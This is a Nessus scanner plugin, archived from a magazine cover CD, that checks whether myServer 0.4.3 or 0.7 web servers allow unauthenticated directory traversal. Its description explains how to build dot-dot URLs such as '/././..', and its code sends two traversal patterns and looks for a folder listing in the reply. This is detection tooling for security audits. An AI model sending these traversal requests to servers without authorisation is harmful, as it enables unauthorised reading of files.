home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / myserver_traversal.nasl

< prev

next >

Wrap

Text File  |  2005-03-31  |  3KB  |  86 lines

---

1. #
2. # This script was written by Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>
3. #
4. # See the Nessus Scripts License for details
5. #
6. # References:
7. #
8. # From:    "Securiteinfo.com" <webmaster@securiteinfo.com>
9. # To:    bugtraq@securityfocus.com
10. # Date:    Wed, 15 Sep 2004 17:42:48 +0200
11. # CC:    admin@succurit.com, bugs@securitytracker.com, contact@isecurelabs.com,
12. #  dis@phreak.org, news@securiteam.com, snpMarq@yahoo.com, 
13. #  submissions@packetstormsecurity.org, ts@securityoffice.net, 
14. #  vuln@security-corporation.com, vulnwatch@vulnwatch.org
15. # Message-Id:    <200409151742.48914.webmaster@securiteinfo.com>
16. # Subject:    myServer 0.7 Directory Traversal Vulnerability
17. # 
18.  
19. if(description)
20. {
21.  script_id(11851);
22.  script_version ("$Revision: 1.3 $");
23.  
24.  name["english"] = "myServer 0.4.3 / 0.7 Directory Traversal Vulnerability";
25.  script_name(english:name["english"]);
26.  
27.  desc["english"] = "
28. This web server is running myServer <= 0.4.3 or 0.7. This version contains
29. a directory traversal vulnerability, that allows remote users with
30. no authentication to read files outside the webroot.
31.  
32. You have to create a dot-dot URL with the same number of '/./' and '/../'
33. + 1. For example, you can use :
34. /././..
35. /./././../..
36. /././././../../..
37. /./././././../../../..
38. etc...
39. or a long URL starting with ./././. etc.
40.  
41. More information : http://www.securityfocus.com/archive/1/339145
42.  
43. Solution : Upgrade to myServer 0.7.1 or later
44. Risk factor : High";
45.  
46.  
47.  script_description(english:desc["english"]);
48.  
49.  summary["english"] = "Attempts to retrieve the path '/././..'";
50.  script_summary(english:summary["english"]);
51.  
52.  script_category(ACT_ATTACK);
53.  script_copyright(english:"Author Paul Johnston paul@westpoint.ltd.uk, Copyright (C) 2003 Westpoint Ltd");
54.  script_family(english:"CGI abuses");
55.  
56.  script_dependencie("find_service.nes", "http_version.nasl");
57.  script_require_ports("Services/www", 80);
58.  
59.  exit(0);
60. }
61.  
62. include("http_func.inc");
63. include("http_keepalive.inc");
64.  
65. port = get_http_port(default:80);
66.  
67. if(!get_port_state(port))exit(0);
68.  
69. # In fact, myServer 0.7 is also vulnerable to the first URL.
70. # However, as the bug was supposed to be fixed in 0.4.3 and reappeared in 
71. # 0.7, I think that checking every avatar is safer.
72.  
73. foreach pattern (make_list("/././..", "././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"))
74. {
75.  req = http_get(item: pattern, port:port);
76.  res = http_keepalive_send_recv(port:port, data:req);
77.  if(res == NULL) exit(0);
78.  
79.  if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 200 ", string:res)
80.     && egrep(pattern:"Contents of folder \.\.", string:res, icase:1))
81.  {
82.   security_hole(port);
83.   exit(0);
84.  }
85. }
86.